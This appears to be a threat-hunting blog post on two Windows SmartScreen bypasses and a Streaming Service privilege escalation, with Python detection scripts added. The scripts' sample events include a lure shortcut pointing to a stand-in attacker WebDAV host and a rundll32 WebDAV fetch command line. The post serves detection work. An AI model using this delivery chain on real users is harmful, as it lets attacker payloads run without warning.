Hunting Exploitation of SmartScreen and Streaming Service CVEs | Threat SnapShot
Let's face it: if patch management were a silver bullet we wouldn't need vulnerability management, and threat actors know this. Vulnerabilities get picked up by threat actors and exploited as 1-days, often long after the fix has shipped. In this week's Threat SnapShot, we'll look at a few recent Windows vulnerabilities that have been added to the CISA Known Exploited Vulnerabilities (KEV) catalog and are actively used by threat actors like Water Hydra and Raspberry Robin. The first, a pair of Microsoft Defender SmartScreen bypasses (CVE-2023-36025 and CVE-2024-21412), lets a crafted Internet Shortcut (.url) file that points at an attacker-hosted WebDAV share skip the SmartScreen and Mark-of-the-Web warning, so a victim who opens the shortcut runs the attacker's payload with no prompt (Water Hydra used this to deliver DarkMe to traders). The second, an elevation of privilege bug in the Microsoft Streaming Service Proxy driver (mskssrv.sys, CVE-2023-29360), lets an attacker who already has code running on a host gain SYSTEM privileges. We'll dig into these threats and discuss detection and threat hunting strategies to keep you protected.
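To make the SmartScreen side concrete, here is an added example (my code, not the video's material or SnapAttack's detection content) of the three telemetry checks the WebDAV-delivered .url chain leaves behind: the shortcut body itself, the rundll32/davclnt.dll process creation that the Windows WebDAV client produces, and the Mini-Redirector user agent seen at the proxy. The lure host, the internal DNS suffix and the event schema are assumptions, and the sample events are constructed.

```python
"""Added example (not from the video or SnapAttack): toy detections for the .url-over-WebDAV
delivery chain behind CVE-2023-36025 / CVE-2024-21412 lures. Hosts, the internal DNS
suffix and the event schema are assumptions; SAMPLE_EVENTS is constructed telemetry."""
import ipaddress
import re

INTERNAL_SUFFIXES = (".corp.example",)        # assumed intranet DNS suffixes
MINIREDIR_UA = "Microsoft-WebDAV-MiniRedir/"   # user agent of the Windows WebDAV client
# rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie <host> <url>
DAVSETCOOKIE = re.compile(r"davclnt\.dll\s*,\s*DavSetCookie\s+(\S+)\s+(\S+)", re.I)

def parse_internet_shortcut(text):
    """Parse the INI-style body of a .url file into {KEY: value}."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if "=" in line and not line.startswith(("[", ";")):
            key, _, value = line.partition("=")
            fields[key.strip().upper()] = value.strip()
    return fields

def unc_host_token(target):
    """Host token ('host', 'host@80', 'host@SSL') of a UNC path or file:// URL; None if local."""
    t = target.strip().replace("/", "\\")
    if t.lower().startswith("file:"):
        t = "\\\\" + t[5:].lstrip("\\")
    if not t.startswith("\\\\"):
        return None                            # drive letter, relative path or http(s) URL
    return t[2:].split("\\", 1)[0] or None

def is_remote_host(token):
    """True when a share host is off-box and off-intranet, or uses WebDAV @port syntax."""
    if not token:
        return False
    if "@" in token:
        return True      # host@80 / host@SSL@443 is WebDAV, never an ordinary SMB share
    host = token.strip("[]").lower()
    try:                 # caveat: RFC 5737 documentation ranges are not is_global in Python
        return ipaddress.ip_address(host).is_global
    except ValueError:
        pass
    if host == "localhost" or "." not in host:
        return False     # single-label NetBIOS name: treat as intranet
    return not host.endswith(INTERNAL_SUFFIXES)

def shortcut_findings(url_file_text):
    """A remote-share target, or a .url that chains to a second .url (the CVE-2024-21412 trick)."""
    target = parse_internet_shortcut(url_file_text).get("URL", "")
    reasons = []
    if is_remote_host(unc_host_token(target)):
        reasons.append("shortcut target is a remote share: " + target)
    if target.lower().endswith(".url"):
        reasons.append("shortcut chains to a second .url file")
    return reasons

def process_findings(cmdline):
    """rundll32 driving the WebDAV client (davclnt.dll) against an external host."""
    m = DAVSETCOOKIE.search(cmdline)
    return ["rundll32 WebDAV client fetching " + m.group(2)] if m and is_remote_host(m.group(1)) else []

def proxy_findings(user_agent, dest_host):
    """The Windows Mini-Redirector user agent leaving the network."""
    if user_agent.startswith(MINIREDIR_UA) and is_remote_host(dest_host):
        return ["WebDAV Mini-Redirector talking to " + dest_host]
    return []

def triage(events):
    """Route each event to its check; returns [(event_id, reason), ...]."""
    hits = []
    for ev in events:
        if ev["kind"] == "file_write" and ev["path"].lower().endswith(".url"):
            reasons = shortcut_findings(ev["content"])
        elif ev["kind"] == "process_create":
            reasons = process_findings(ev["cmdline"])
        elif ev["kind"] == "proxy":
            reasons = proxy_findings(ev["user_agent"], ev["dest_host"])
        else:
            reasons = []
        hits.extend((ev["id"], r) for r in reasons)
    return hits

SAMPLE_EVENTS = [  # constructed; the lure host and users are made up
    {"id": 1, "kind": "file_write", "path": r"C:\Users\trader\Downloads\chart_2024.jpg.url",
     "content": "[InternetShortcut]\nURL=file://webdav.lure.example/share/chart.url\nIconIndex=1\n"},
    {"id": 2, "kind": "process_create", "cmdline": r"rundll32.exe C:\Windows\system32\davclnt.dll,"
     "DavSetCookie webdav.lure.example http://webdav.lure.example/share/chart.url"},
    {"id": 3, "kind": "proxy", "user_agent": "Microsoft-WebDAV-MiniRedir/10.0.19045",
     "dest_host": "webdav.lure.example"},
    {"id": 4, "kind": "file_write", "path": r"C:\Users\bob\Desktop\wiki.url",
     "content": "[InternetShortcut]\nURL=https://wiki.corp.example/home\n"},
    {"id": 5, "kind": "process_create", "cmdline": r"rundll32.exe C:\Windows\system32\davclnt.dll,"
     "DavSetCookie fileserver http://fileserver/DavWWWRoot/"},
]

if __name__ == "__main__":
    for event_id, reason in triage(SAMPLE_EVENTS):
        print(event_id, reason)
```

Run as-is it reports four findings: two for the nested shortcut (remote share target and the .url-to-.url chain), one for the davclnt.dll fetch and one for the Mini-Redirector user agent, while the intranet wiki shortcut and the internal file server stay quiet. The `@80` / `@SSL` host syntax is the strongest single indicator, since ordinary SMB shares never carry it; the allow-list of internal suffixes is where you will spend your tuning time.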
References:
- https://thehackernews.com/2024/02/darkme-malware-targets-traders-using.html
- https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html
- https://www.bleepingcomputer.com/news/security/cisa-warns-of-microsoft-streaming-bug-exploited-in-malware-attacks/
- https://big5-sec.github.io/posts/CVE-2023-29360-analysis/
SnapAttack Resources:
- https://app.snapattack.com/collection/e9f61b49-96ec-4c71-9f7a-0d9124092a08 - Collection: Water Hydra Exploits Microsoft Defender SmartScreen Zero-Day | Threat SnapShot
- https://app.snapattack.com/threat/34819dae-a7c4-3eb7-ec0e-a21cb42eedb7 - Threat: CVE-2023-36025 - Smartscreen Bypass
- https://app.snapattack.com/threat/dacaaf37-367c-2155-c3ea-8bb32af0a041 - Threat: CVE-2024-21412 SmartScreen Bypass
- https://app.snapattack.com/detection/2d7fd86e-46a4-4a66-bd8a-74a546e9118a - Detection: Possible CVE-2023-36025 Exploitation
- https://app.snapattack.com/detection/b72dd072-dccf-4100-a88f-c86c56c82e2c - Detection: Suspicious URL File
- https://app.snapattack.com/detection/4bb8e281-05d0-4239-af59-81ddcc588f8b - Detection: Suspicious WebDav HTTP Request
- https://app.snapattack.com/detection/387b1374-551f-4264-9f38-e3cad3d2ea4a - Detection: Suspicious File Execution From Internet Hosted WebDav Share
- https://app.snapattack.com/detection/3f1b37cf-2b67-4d9e-bf67-d5c445a27f54 - Detection: Windows WebDAV User Agent
- https://app.snapattack.com/detection/0393f30a-6d43-4c57-8a03-c49595aa809c - Detection: Suspicious WebDav Client Execution Via Rundll32.EXE
- https://app.snapattack.com/collection/eaecd83e-c70f-4759-a6f3-df7072e89a5e - Collection: Microsoft Streaming Service Elevation of Privilege (CVE-2023-29360) | Threat SnapShot
- https://app.snapattack.com/threat/bec9bd5a-9aa2-cbfd-51c0-05c21554d45f - Threat: CVE-2023-29360 Windows Streaming Service Privilege Escalation
- https://app.snapattack.com/detection/5b98ef3a-e0d7-49f3-83bd-445493d3313e - Detection: Elevated System Shell Spawned
- https://app.snapattack.com/detection/20759450-557b-46d8-9379-b648c4d10644 - Detection: Possible Winlogon Process Injection
- https://app.snapattack.com/detection/b33d0a5c-055b-411d-88f9-824ee3629206 - Detection: Win32 OpenProcess API Call With PROCESS_ALL_ACCESS Rights
- https://app.snapattack.com/detection/2eb4ff43-c7b8-46aa-8b4c-5d487d8042cc - Detection: Possible Windows Streaming Service Driver Exploitation
- https://app.snapattack.com/detection/d2d4af6a-6c2b-4d79-80c5-fc2cf12a2f68 - Detection: Windows Drivers Loaded by Signature
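For the privilege-escalation side, here is an added example (my code, not SnapAttack's "Elevated System Shell Spawned" detection) of the process-lineage idea behind it: a kernel LPE like CVE-2023-29360 ends with a process started by an ordinary user holding a SYSTEM token, and the next thing that usually happens is a shell. The check below flags a SYSTEM shell whose parent either runs as a lower-privileged user or is not one of the usual SYSTEM launchers. Field names loosely follow Sysmon process-create events (ParentUser needs Sysmon 13 or later); the trusted-parent list is an assumption and the events are constructed.

```python
"""Added example (not from the video or SnapAttack): a process-lineage check for the
post-exploitation step of a kernel LPE such as CVE-2023-29360, where a process started by
an ordinary user ends up holding a SYSTEM token and spawns a shell. Field names loosely
follow Sysmon process-create events (Image, User, ParentImage, ParentUser); the trusted
parent list is an assumption and SAMPLE_EVENTS is constructed telemetry."""

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe"}
SYSTEM_USER = "NT AUTHORITY\\SYSTEM"
# Launchers that legitimately start SYSTEM shells: services, scheduled tasks, installers.
# winlogon.exe is left out on purpose: a shell under it is itself worth a look.
TRUSTED_SYSTEM_PARENTS = {"services.exe", "svchost.exe", "wininit.exe", "msiexec.exe"}

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def flag_system_shells(events):
    """Return [(event_id, reason)] for SYSTEM shells with an untrusted or lower-privileged parent."""
    hits = []
    for ev in events:
        child, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        if child not in SHELLS or ev["User"].upper() != SYSTEM_USER:
            continue                      # only SYSTEM-integrity shells are of interest here
        if ev["ParentUser"].upper() != SYSTEM_USER:
            # The parent never had SYSTEM itself, so the child's token came from somewhere
            # else: that is what a token-swapping kernel exploit looks like from user land.
            hits.append((ev["id"], f"SYSTEM {child} spawned by {parent} running as {ev['ParentUser']}"))
        elif parent not in TRUSTED_SYSTEM_PARENTS:
            hits.append((ev["id"], f"SYSTEM {child} spawned by unexpected SYSTEM parent {parent}"))
    return hits

SAMPLE_EVENTS = [  # constructed
    {"id": 1, "Image": r"C:\Windows\System32\cmd.exe", "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\updater.exe", "ParentUser": "DESK\\alice"},
    {"id": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentUser": "NT AUTHORITY\\SYSTEM"},
    {"id": 3, "Image": r"C:\Windows\System32\cmd.exe", "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": r"C:\Windows\System32\winlogon.exe", "ParentUser": "NT AUTHORITY\\SYSTEM"},
    {"id": 4, "Image": r"C:\Windows\System32\cmd.exe", "User": "DESK\\bob",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentUser": "DESK\\bob"},
    {"id": 5, "Image": r"C:\Windows\System32\conhost.exe", "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "ParentUser": "NT AUTHORITY\\SYSTEM"},
]

if __name__ == "__main__":
    for event_id, reason in flag_system_shells(SAMPLE_EVENTS):
        print(event_id, reason)
```

Events 1 and 3 are the ones that fire: a SYSTEM cmd.exe under a user-owned binary in a Temp folder, and a SYSTEM cmd.exe under winlogon.exe. The parent-user mismatch is the low-noise signal; the unexpected-parent branch will need tuning for EDR agents, backup software and the like that legitimately launch shells as SYSTEM, and the SYSTEM account name differs on localized Windows builds.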